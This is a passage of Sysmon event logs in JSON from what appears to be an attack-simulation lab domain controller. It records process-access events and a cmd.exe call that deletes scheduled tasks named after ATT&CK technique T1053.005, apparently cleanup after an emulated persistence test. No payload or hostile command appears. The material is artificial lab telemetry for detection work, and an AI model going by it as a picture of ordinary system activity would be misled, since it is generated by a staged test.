06:55:22.448","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6028,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.448\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.448","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6029,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.448\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.448","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6030,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.448\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.448","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6031,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.448\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.448","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6032,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.448\r\nSourceProcessGUID: {E2A3D6B1-11D8-5F25-0000-001077810800}\r\nSourceProcessId: 3824\r\nSourceThreadId: 4796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D2-5F25-0000-001053D70700}\r\nTargetProcessId: 4720\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.448","SourceProcessGUID":"{E2A3D6B1-11D8-5F25-0000-001077810800}","SourceProcessId":"3824","SourceThreadId":"4796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D2-5F25-0000-001053D70700}","TargetProcessId":"4720","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6033,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.464\r\nSourceProcessGUID: {E2A3D6B1-11D9-5F25-0000-0010B0A70800}\r\nSourceProcessId: 1092\r\nSourceThreadId: 4108\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11DA-5F25-0000-001064CA0800}\r\nTargetProcessId: 4720\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1F3FFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFF448A0F13)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.464","SourceProcessGUID":"{E2A3D6B1-11D9-5F25-0000-0010B0A70800}","SourceProcessId":"1092","SourceThreadId":"4108","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11DA-5F25-0000-001064CA0800}","TargetProcessId":"4720","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1f3fff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFF448A0F13)","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6034,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.465\r\nProcessGuid: {E2A3D6B1-11DA-5F25-0000-001016CB0800}\r\nProcessId: 4820\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sctasks.exe\r\nCommandLine: schtasks  /delete /tn \"T1053_005_OnLogon\" /f  \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D8-5F25-0000-0020C7800800}\r\nLogonId: 0x880C7\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F\r\nParentProcessGuid: {E2A3D6B1-11DA-5F25-0000-001064CA0800}\r\nParentProcessId: 4720\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \"C:\\Windows\\system32\\cmd.exe\" /c \"schtasks /delete /tn \"T1053_005_OnLogon\" /f >nul 2>&1 & schtasks /delete /tn \"T1053_005_OnStartup\" /f >nul 2>&1\" ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.465","ProcessGuid":"{E2A3D6B1-11DA-5F25-0000-001016CB0800}","Image":"C:\\Windows\\System32\\schtasks.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Task Scheduler Configuration Tool","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"sctasks.exe","CommandLine":"schtasks  /delete /tn \"T1053_005_OnLogon\" /f  ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D8-5F25-0000-0020C7800800}","LogonId":"0x880c7","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F","ParentProcessGuid":"{E2A3D6B1-11DA-5F25-0000-001064CA0800}","ParentProcessId":"4720","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"schtasks /delete /tn \"T1053_005_OnLogon\" /f &gt;nul 2&gt;&amp;1 &amp; schtasks /delete /tn \"T1053_005_OnStartup\" /f &gt;nul 2&gt;&amp;1\" ","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6035,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.464\r\nSourceProcessGUID: {E2A3D6B1-11DA-5F25-0000-001064CA0800}\r\nSourceProcessId: 4720\r\nSourceThreadId: 4912\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-11DA-5F25-0000-001016CB0800}\r\nTargetProcessId: 4820\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+8564|C:\\Windows\\system32\\cmd.exe+c347|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.464","SourceProcessGUID":"{E2A3D6B1-11DA-5F25-0000-001064CA0800}","SourceProcessId":"4720","SourceThreadId":"4912","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-11DA-5F25-0000-001016CB0800}","TargetProcessId":"4820","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+8564|C:\\Windows\\system32\\cmd.exe+c347|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6036,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.464\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: 